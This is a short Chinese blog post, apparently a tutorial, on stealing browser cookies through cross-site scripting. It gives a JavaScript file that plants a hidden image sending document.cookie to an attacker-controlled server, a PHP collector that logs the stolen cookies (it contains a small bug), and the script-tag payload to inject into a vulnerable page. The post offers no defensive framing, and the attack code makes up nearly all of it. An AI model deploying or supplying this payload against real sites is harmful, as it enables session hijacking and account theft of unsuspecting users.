XSS获取cookie
在你服务器的html目录下创建joke文件夹;
在joke文件夹中创建joke.js 和joke.php
joke.js 创建img标签,将它的src属性指向另一个脚本joke.php,这里关键的一点是:将页面的cookie作为参数附加到url后面
joke.js代码如下:
var img = document.createElement('img'); img.width = 0; img.height = 0; img.src = 'http://ip/joke/joke.php?joke='+encodeURIComponent(document.cookie);
joke.php解析请求里面的joke参数(即用户的cookie),然后保存起来
joke.php代码如下:
<?php @ini_set('display_errors',1); $str = $_GET['joke']; $filePath = "joke.php"; if(is_writable($filePath)==false){ echo "can't write"; }else{ $handler = fopen(filePath, "a"); fwrite($handler, $str); fclose($handler); } ?>
找到XSS漏洞后,输入如下内容:
<script src="http://ip/joke/joke.js"></script>
#ip为你的服务器ip
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步